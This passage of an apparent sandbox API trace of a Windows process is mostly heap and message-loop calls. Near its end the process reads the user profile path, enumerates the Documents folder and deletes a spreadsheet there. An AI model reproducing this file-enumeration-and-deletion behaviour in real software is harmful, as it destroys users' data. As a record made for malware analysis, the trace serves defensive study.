wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0265.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0265.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0265.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0265.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0265.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0265.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0265.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0265.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0265.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0265.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0265.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0265.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0265.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0265.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0265.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0265.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0265.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0265.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0265.526] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.526] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0265.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0265.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0265.526] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.526] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0265.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0265.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0265.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0265.526] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.527] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.527] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0265.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0265.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0265.527] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.527] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0265.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0265.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0265.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0265.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0265.527] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.527] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0265.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0265.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0265.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0265.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0265.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0265.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0265.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0265.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0265.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0265.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0265.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0265.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0265.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0265.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0265.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0265.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0265.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0265.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0265.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0265.535] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.535] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.535] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.535] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.535] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0265.535] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.535] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.535] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.536] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.536] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.536] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.536] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.536] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.536] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0265.536] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.536] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0265.536] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.536] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.536] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.536] CryptReleaseContext (hProv=0xad2be8, dwFlags=0x0) returned 1 [0265.536] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.537] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.537] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.537] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.537] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.537] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.537] FreeLibrary (hLibModule=0x74d40000) returned 1 [0265.537] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.537] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.537] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.544] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.544] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.544] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.545] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0265.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0265.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0265.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0265.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0265.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0265.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0265.545] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0265.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0265.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0265.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0265.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0265.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0265.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0265.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0265.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0265.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0265.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0265.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0265.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0265.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0265.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0265.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0265.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0265.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0265.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6a) returned 0x240c8d0 [0265.547] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/oh6dPV4.xlsx", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oh6dPV4.xlsx", lpFilePart=0x8bedfc*="oh6dPV4.xlsx") returned 0x34 [0265.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c8d0 | out: hHeap=0x25c0000) returned 1 [0265.547] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oh6dPV4.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oh6dpv4.xlsx")) returned 0x20 [0265.547] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oh6dPV4.xlsx", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a565b20, ftCreationTime.dwHighDateTime=0x1d4cd29, ftLastAccessTime.dwLowDateTime=0xb5d49130, ftLastAccessTime.dwHighDateTime=0x1d4c95f, ftLastWriteTime.dwLowDateTime=0xb5d49130, ftLastWriteTime.dwHighDateTime=0x1d4c95f, nFileSizeHigh=0x0, nFileSizeLow=0x2a8f, dwReserved0=0x1e16, dwReserved1=0x4, cFileName="oh6dPV4.xlsx", cAlternateFileName="OH6DPV~1.XLS")) returned 0xaa58a0 [0265.547] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oh6dPV4.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oh6dpv4.xlsx")) returned 1 [0265.548] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a565b20, ftCreationTime.dwHighDateTime=0x1d4cd29, ftLastAccessTime.dwLowDateTime=0xb5d49130, ftLastAccessTime.dwHighDateTime=0x1d4c95f, 